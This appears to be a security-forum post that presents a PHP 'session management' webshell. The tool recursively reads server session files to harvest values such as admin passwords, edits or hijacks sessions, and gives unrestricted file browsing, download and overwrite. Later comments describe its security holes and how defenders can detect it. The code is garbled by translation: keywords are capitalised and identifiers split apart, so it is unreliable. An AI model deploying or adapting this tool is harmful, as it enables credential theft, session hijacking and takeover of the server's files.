Author: Inking
Source: evil baboons Information Security Team (www.eviloctal.com)
The network on my floor went down two days ago, so I could not do much. I had just read an article about session penetration written by Mad Dog on his blog. The article was very simple, and in the end Mad Dog was "stingy" and did not release the program, so, useful or not, I wrote one myself first. Because I could not look anything up, I had to rely on the manual. The code may still have defects in many places; the most troublesome parts were the regular expressions and the file-stream operations. The nested loops got my head thoroughly confused, and debugging took a whole day (writing code is hard). I hope you will offer more comments. Mad Dog's article: http://www.loveshell.net/blog/blogview.asp?LogID=101
After writing the program, I did a rough test of its execution efficiency.
Execution environment: Windows XP, PHP 5, Apache 2, Core 2050 at 1.6 GHz, 512 MB of memory, 945 motherboard.
File system: a 6-level directory tree with 1000 files per level; each session file is about 50 bytes.
Searching these 6000 files takes about 10-15 seconds, which is not as slow as I expected.
The code is as follows: <?
// Download request: runs before any HTML is emitted. The directory and file name are
// taken straight from the query string and handed to download() (defined below) with
// no validation, allow-list or realpath check, so any file the web-server account can
// read is served to whoever can reach this script. Output buffering is started first
// so the headers sent by download() are not preceded by page output.
// Defender's note: requests carrying download=, dirname= and filename= to an
// unexpected script are a high-signal pattern in web-server access logs.
If (isset ($ _ GET ['Download']) {
$ Filename = $ _ GET ['filename'];
$ Dirname = $ _ GET ['dirname'];
Ob_start ();
Download ($ dirname, $ filename );
Flush;
}
// Start a session so the configured save_path is known; its value is only used as the
// default for the "SESSION path" form field below (the scan root is still caller-chosen).
Session_start ();
$ Default = ini_get ('session. save_path ');
// Directory of this script with backslashes normalised to "/". Not referenced anywhere
// else in the visible code.
$ Thispath = str_replace ("\", "/" ,__ FILE __);
$ Thispath = substr ($ thispath, 0, strrpos ($ thispath ,"/"));
?>
<Html>
<Head>
<Title> SESSION management tool </title>
<Head>
<Style>
Body {
Margin: 0;
Padding: 0;
Background: #000000;
Color: green;
Margin-top = 60px;
FONT-FAMILY: verdana;
FONT-SIZE: 10px;
}
Input {
Margin: 0px;
Padding: 0px;
Color: green;
Border: 1px;
Border-bottom-color: # ffffff;
}
Hr {
Width: 85%;
Height: 1px;
}
</Style>
</Head>
<Body> <center> <Hr>
<P> </p>
<!-- Search form. "spath" is read server-side as the root of a recursive scan for
     sess_* files; it is used as given, so the scan root is entirely caller-controlled.
     The form action echoes PHP_SELF without HTML escaping. "fetch" selects keyword
     mode (searchone) or dump-everything mode (all); "sessname" is the keyword. -->
<Table border = 1 bordercolorlight = "000000" bordercolordark = "000000">
<Form action = <? Echo $ _ SERVER ['php _ SELF '];?> Method = GET>
<Tr> <td> <B> SESSION path </B> <input type = text name = spath value = "<? Echo $ default;?> "> </Td> </tr>
<Tr> <td> <input type = "radio" checked name = "fetch" value = searchone onclick = "sessname. disabled = false; "> <B> Search for a specified SESSION </B>
<Input type = text name = sessname>
<Tr> <td> <input type = "radio" name = "fetch" value = all onclick = "sessname. disabled = true; "> <B> Read all sessions </B>
<Input type = submit value = read> <input type = reset value = reset> </td> </tr> </form> </table> <p> </p>
<Table border = 1 bordercolorlight = "000000" bordercolordark = "000000">
<?
// Server-side handling of the form above. The execution time limit is removed because
// the recursive scan below can take a long time on a large session directory (see the
// timings given at the top of the page).
Set_time_limit (0 );
// Compatibility shim for PHP versions before 4.1, which had no $_GET / $_POST.
If (PHP_VERSION <'4. 1.0 '){
$ _ POST = & $ HTTP_POST_VARS;
$ _ GET = & $ HTTP_GET_VARS;
}
// Scan root, used verbatim from the query string: no canonicalisation, no check that it
// lies under the configured session save_path.
$ Spath = $ _ GET ['spath'];
If (isset ($ _ GET ['fetch']) {// keyword search
// Keyword mode. getfname() walks the tree under $spath; getvalue() keeps only the
// session variables whose *name* matches the keyword, which it applies as a
// case-insensitive regular expression (eregi). Hits accumulate in the global
// $session[file path][session id][variable name] = value.
If (isset ($ _ GET ['fetch'] ['searchon']) & isset ($ _ GET ['sessname']) & $ type = "1 ") {
! Empty ($ _ GET ['ssname']) or die ("<tr> <td> <font color = # B3614D> enter a search keyword </font> </td> </tr> ");
$ Sessname = $ _ GET ['ssname'];
Getfname ($ spath );
Count ($ session)> 0 or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness or modify the keyword </font> </td> </tr> ");
// Render each hit as a link back to this script (modfname = session file path,
// modname = session id, modify = 1). Paths, names and session values are written into
// the HTML without any escaping, so a session value containing markup is rendered as-is.
Foreach ($ session as $ fpath => $ sessinfo ){
Foreach ($ sessinfo as $ sessid => $ contents ){
Echo "<tr> <p> <td> <a href =? Modfname = ". $ fpath. "& modname = ". $ sessid. "& modify = 1> SID :". $ sessid. "</a> </td> </p> </tr> ";
Foreach ($ contents as $ name => $ value)
Echo "<tr> <td> <p>". $ name. "=>". $ value. "</p> </td> </tr> ";
}
}
}
// Dump mode: $type = 0 makes getvalue() keep every variable of every sess_* file found.
// The rendering loop is identical to the keyword branch above.
Elseif (isset ($ _ GET ['fetch'] ['all']) {// find all
$ Type = 0;
Getfname ($ spath );
Count ($ session)> 0 or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness </font> </td> </tr> ");
Foreach ($ session as $ fpath => $ sessinfo ){
Foreach ($ sessinfo as $ sessid => $ contents ){
Echo "<tr> <p> <td> <a href =? Modfname = ". $ fpath. "& modname = ". $ sessid. "& modify = 1> SID :". $ sessid. "</a> </td> </p> </tr> ";
Foreach ($ contents as $ name => $ value)
Echo "<tr> <td> <p>". $ name. "=>". $ value. "</p> </td> </tr> ";
}
}
}
Echo "</center> </table> ";
}
// Per-variable edit form. The file to edit (modfname) comes from the query string and is
// passed to getvalue() in "modify" mode, which fills the global $modsession instead of
// $session. Nothing restricts modfname to the session directory.
If (isset ($ _ GET ['modify']) {// display the content of a file
$ Modify = $ _ GET ['modify'];
$ Fpath = $ _ GET ['modfname'];
$ Sid = $ _ GET ['modname'];
Getvalue ($ fpath, '1 ','');
// The path is echoed into the page unescaped and also carried to the POST handler in
// the hidden m_path field, so the write target of the next request is chosen by the
// client, not by anything the server remembered.
Echo "<tr> <td> path of the modified session file: <p>". $ fpath. "</p> </td> </tr> ";
Echo "<form action =". $ _ SERVER ['php _ SELF ']. "method = post> ";
Echo "<input type = hidden value =". $ fpath. "name = m_path> ";
! Empty ($ modsession) or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness </font> </td> </tr> ");
Foreach ($ modsession as $ modsessinfo ){
Foreach ($ modsessinfo as $ modsessid => $ contents ){
Echo "<tr> <p> <td> SESSION_ID <input type = text name = m_sid value = ". $ modsessid. "> </td> </p> </tr> ";
// m_value[] is indexed positionally; the POST handler below applies m_value[$i] to the
// i-th ";"-separated piece of the file, so the order here must match the file's order.
$ I = 0;
Foreach ($ contents as $ modname => $ modvalue ){
Echo "<tr> <td> <p> ". $ modname. "=> <input type = text name = m_value [". $ I ++. "] value = ". $ modvalue. "> </p> </td> </tr> ";
}
}
}
Echo "<tr> <td> <input type = submit value = confirm modification> or <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ fpath ). "> open the file </a> and edit it completely <a href = \" javascript: history. go (-1); \ "> or return to modify other </a> </td> </tr> </form> </center> </table> ";
}
// Per-variable write-back. The target path comes from the POST body (hidden m_path
// field), so this is an arbitrary-file write for any path the web-server account can
// write to. Neither fopen() call is checked for failure.
If (isset ($ _ POST ['m _ path']) {// modify a single value
$ M_path = $ _ POST ['m _ path'];
$ M_value = $ _ POST [m_value];
// Only the first line, at most 1024 bytes, is read and split on ";".
$ F = fopen ($ m_path, 'R ');
$ Content = fgets ($ f, 1024 );
$ Explode = explode (";", $ content );
Fclose ($ f );
// Reopening with 'w' truncates the file: whatever was not captured by the single
// fgets() above is discarded, and only the rebuilt pieces below are written back.
$ F = fopen ($ m_path, 'w ');
$ M_content = '';
// For each submitted value, replace the double-quoted part of the i-th piece with the
// new value and re-append the ";" separator.
For ($ I = 0; $ I <count ($ m_value); $ I ++ ){
$ Modified = ereg_replace ("\". * \ "", '"'. $ m_value [$ I]. '"', $ explode [$ I]);
$ M_content. = $ modified .";";
}
Fwrite ($ f, $ m_content );
Fclose ($ f );
// The Referer request header is reflected into an href without escaping.
// Defender's note: file-integrity monitoring on the session save_path catches rewrites
// made through this path, since they happen via the web-server process itself.
Echo "<tr> <td> modified successfully, <a href = ". $ _ SERVER ['HTTP _ referer']. "> return and modify the session file again </a> </td> </tr> </center> </table> ";
}
// Whole-file edit form: reads the entire file named by modfname (query string, no
// restriction) and places its contents in a textarea. The path and the raw file content
// are echoed without HTML escaping, so content containing "</textarea>" or other markup
// breaks out of the form.
If (isset ($ _ GET ['modify _ all']) {// display the content of the file to be modified
$ Filepath = $ _ GET ['modfname'];
$ F = fopen ($ filepath, "r ");
$ Fcontent = fread ($ f, filesize ($ filepath ));
Echo "<tr> <td> the file you are modifying is". $ filepath;
Echo "<form action =". $ _ SERVER ['php _ SELF ']. "method = post> ";
// The write target for the POST handler below travels in a hidden field.
Echo "<input type = hidden name = filepath value =". $ filepath. "> ";
Echo "<center> <textarea cols = 100 rows = 15 name = m_content>". $ fcontent. "</textarea> </center> ";
Echo "<p> <input type = submit value = confirm modification> <a href = \" javascript: history. go (-1 ); \ "> back to the previous step </a> </form> </p> </td> </tr> </center> </table> ";
Fclose ($ f );
}
// Whole-file write-back: overwrites the file named in the POST body with the POST body.
// Both the path and the content are client-supplied; fopen() is not checked.
If (isset ($ _ POST ['m _ content']) {// complete modification
$ M_content = $ _ POST ['m _ content'];
$ Filepath = $ _ POST ['filepath'];
// Undo the escaping added by magic_quotes_gpc so the bytes written match what was typed.
If (get_magic_quotes_gpc () $ m_content = stripslashes ($ m_content );
$ F = fopen ($ filepath, "w ");
Fwrite ($ f, $ m_content );
Fclose ($ f );
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ filepath)."> click here to view or modify it again </a> </td> </tr> ";
Echo "<tr> <td> <a href = ". $ _ SERVER ['php _ SELF ']. "> back to homepage </a> </td> </tr> </center> </table> ";
}
// ?help= : prints the author's usage notes (a heredoc) as a table row.
If (isset ($ _ GET ['help']) {// display help
Print <eof
<Tr> <td> the function of this program is to read the values of all session files in this folder and Its subfolders from the specified folder, or to search for session files containing the specified keyword, however, because the database function is not used, it does not support multiple keyword searches. Please search for keywords like "admin", "pwd", "user ", "password" and other keywords that may contain administrator information. <br> If the server has a large access volume, many session files are generated. It is best to use the Keyword Method and wait patiently because the program needs to read and match session files one by one, low efficiency can be imagined. <br> because this program is designed to find relevant content from a large number of session files, it does not add the function of directly modifying the specified session file, the only difference is to edit the session file. if necessary, use NotePad to open the session file and edit it. you can also submit the following url for editing: "http://test.com/session.php? Modfname = <session file path> & modname = <session_id> & modify = 1 ". <br> Replace "\" with "/" whenever possible in the session path field. The default storage path of the windows seesion file is "c:/windows/temp ", it is "/tmp" in linux, but the program will automatically help you read the path of the current session. If you need to read other sessions, please search for them and enter them manually. if you know the specific folder of the session file you need, it is best to specify the folder, which can save time. click "read" and the search result is displayed. The result is displayed in the form of "session_name => value". Click the corresponding session_id to enter the editing status, click "confirm to modify" to modify the relevant content, or click "Open File" to edit the content completely, and then click "save. 
<br> If the directory is incorrect or the session file in the directory is empty, the program reports an error "No sessi in the directory ". On file ", please check carefully at this time. <br> after the program is completed, the network has not been restored, so I added a simple file operation function for ease of use. <br> because I am not very familiar with regular expressions, the working principle of the session may not be very thorough. It took me two days to write it, and debugging took me more than half of the time, so it is inevitable that the bug will be solved, welcome to my blog for more information on regular expression matching. <br> for two articles inspired by this program, see: http://www.loveshell.net/blog/blogview.asp? LogID = 101 <br> Please delete this help document for specific use. This program belongs to Inking and is only for communication. The consequences caused by all use are irrelevant to the author. </td> </tr> </center> </table>
Eof;
}
// Directory browser. The directory comes from the query string without restriction;
// together with the modify_all and download branches this gives a full read/write file
// manager over everything the web-server account can access.
If (isset ($ _ GET ['fcontrol']) {
$ Dirname = $ _ GET ['dirname'];
// Ensure a trailing separator so entries can be appended directly.
If ($ dirname [strlen ($ dirname)-1]! = "\" & $ Dirname [strlen ($ dirname)-1]! = "/") $ Dirname. = "/";
Echo "<tr> <td> current file path:". $ dirname. "</td> </tr> ";
// Unlike getfname(), this branch never calls closedir() on the handle.
$ Opendir = opendir ($ dirname) or die ("<tr> <td> <font color = # B3614D> failed to open the file </font> </td> </tr> ");
While ($ file = readdir ($ opendir )){
If ($ file = "."){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ dirname)."> ". $ file." </a> </td> </tr> ";
Continue;
}
// ".." links to the parent: strip the trailing "/" and then everything after the
// previous "/".
Elseif ($ file = ".."){
$ Newname = substr ($ dirname, 0, strrpos ($ dirname ,"/"));
$ Newname = substr ($ newname, 0, strrpos ($ newname, "/") + 1 );
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ newname)."> ". $ file." </a> </td> </tr> ";
}
// Subdirectories link back into this browser.
Elseif (is_dir ($ dirname. $ file ."/")){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ dirname. $ file)."/> ". $ file." </a> </td> </tr> ";
}
// Extensions getftype() treats as text open in the whole-file editor; everything else
// is offered as a download.
Elseif (getftype ($ file )){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ dirname. $ file)."> ". $ file." </a> </td> </tr> ";
}
Else {
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Download = yes & filename = ". urlencode ($ file ). "& dirname = ". urlencode ($ dirname ). "> ". $ file. "</a> </td> </tr> ";
}
}
}
/**
 * Recursively walk $spath and hand every entry whose name starts with "sess_" to
 * getvalue(). Results are not returned; they land in the globals that getvalue() fills.
 *
 * Communicates through globals: $fpath receives the full path of the current session
 * file and $file receives the part of the entry name after "sess_" (the session id),
 * which getvalue() uses as the second array key. $type is neither declared global nor
 * assigned here, so the value passed as the third argument is presumably undefined;
 * getvalue() declares $type global itself, so the argument is not what it reads.
 *
 * Dies with an HTML fragment when the directory cannot be opened.
 */
Function getfname ($ spath) {// traverse the directory and call the getvalue () function to obtain the values of each session_name
Global $ fpath, $ file;
// Normalise to a trailing separator.
If ($ spath [strlen ($ spath)-1]! = "\" & $ Spath [strlen ($ spath)-1]! = "/") $ Spath. = "/";
$ Opendir = opendir ($ spath) or die ("<tr> <td> <font color = # B3614D> failed to open the file </font> </td> </tr> ");
While ($ file = readdir ($ opendir )){
If ($ file = "." | $ file = "..") continue;
If (is_dir ($ spath. $ file ."/")){
Getfname ($ spath. $ file ."/");
}
Elseif (ereg ("^ sess _", $ file )){
$ Fpath = $ spath. $ file;
// Capture what follows the "sess_" prefix: the session id.
Preg_match ('/(^ sess _) (. +) +/', $ file, $ prex );
$ File = $ prex [2];
Getvalue ($ fpath, '0', $ type );
}
}
Closedir ($ opendir );
}
/**
 * Parse one session file and record its variables in a global array.
 *
 * The global declaration below rebinds $fpath and $type to the globals of the same
 * name, so the values passed for those two parameters are discarded; the callers set
 * the globals before calling. $modify selects the destination: in modify mode
 * entries go to $modsession[$fpath][$sid][name], otherwise to $session[$fpath][$file][name]
 * (keyword mode, $type truthy, keeps only names matching the global $sessname).
 *
 * Only the first line of the file, up to 1024 bytes, is read; it is split on ";" and
 * the loop stops at the first empty piece. Each piece is matched by a regex that appears
 * to take the variable name as the text before the first "|" and the value as the final
 * double-quoted string; pieces that do not match contribute an empty name and value.
 *
 * Side effect worth knowing about: the file is opened in "a+" mode, which creates the
 * file if it does not exist. A modify request for a non-existent path therefore leaves
 * an empty file behind wherever the web-server account can create one.
 *
 * $sessname is applied as a case-insensitive regular expression (eregi), not as a
 * literal substring.
 */
Function getvalue ($ fpath, $ modify = '0', $ type) {// obtain the value of the session variable in a session file.
Global $ type, $ fpath, $ sessname, $ session, $ file, $ modsession, $ sid;
$ F = fopen ($ fpath, "a + ");
$ Content = fgets ($ f, 1024 );
Fclose ($ f );
$ Explode = explode (";", $ content );
$ I = 0;
While ($ match = $ explode [$ I ++]) {
Preg_match ('/(^ [^ \ |] *) + \ |. + \ "(. +) + \" $/', $ match, $ value );
$ Sname = $ value [1];
$ Svalue = $ value [2];
// Modify mode: key by the session id supplied by the caller ($sid), not by file name.
If ($ modify = 1 ){
$ Modsession [$ fpath] [$ sid] [$ sname] = $ svalue;
Continue;
}
// Keyword mode keeps only matching names; dump mode keeps everything.
If ($ type ){
If (eregi ($ sessname, $ sname) = true ){
$ Session [$ fpath] [$ file] [$ sname] = $ svalue;
}
}
Else {
$ Session [$ fpath] [$ file] [$ sname] = $ svalue;
}
}
}
/**
 * Decide whether a file should be opened in the text editor rather than downloaded,
 * based purely on the extension after the last "." (txt, asp, php, ini, log).
 * The check is on the name only; file contents are never inspected. A name without a
 * "." yields strrpos() === false, so the whole name is compared instead of an extension.
 */
Function getftype ($ filename) {// determine the file type
$ Ftype = substr ($ filename, strrpos ($ filename, ".") + 1 );
Switch ($ ftype ){
Case "txt ":
Return true;
Case "asp ":
Return true;
Case "php ":
Return true;
Case "ini ":
Return true;
Case "log ":
Return true;
Default:
Return false;
}
}
/**
 * Send $dirname.$filename to the client as an attachment.
 *
 * Both arguments come from the query string (see the top of the file) and are joined
 * without any canonicalisation or allow-list, so this serves any readable file. The
 * whole file is read into memory before the headers are sent, and the caller-supplied
 * name is placed directly into the Content-Disposition header. "Accept-Length" is not
 * a standard HTTP response header (Content-Length is the one clients use); fopen() is
 * not checked for failure.
 */
Function download ($ dirname, $ filename ){
$ F = fopen ($ dirname. $ filename, "r ");
$ Contents = fread ($ f, filesize ($ dirname. $ filename ));
Fclose ($ f );
Header ("Content-type: application/octet-stream ");
Header ("Accept-Ranges: bytes ");
Header ("Accept-Length:". filesize ($ dirname. $ filename ));
Header ("Content-Disposition: attachment; filename =". $ filename );
Echo $ contents;
}
?>
</Table>
<P> </p>
<Hr>
<Center> <p> Code By Inking <a href = 'HTTP: // hi.baidu.com/in_king'> The Entry To My Website </a> QQ: 165068585 </p>
</Center>
</Body>
</Html>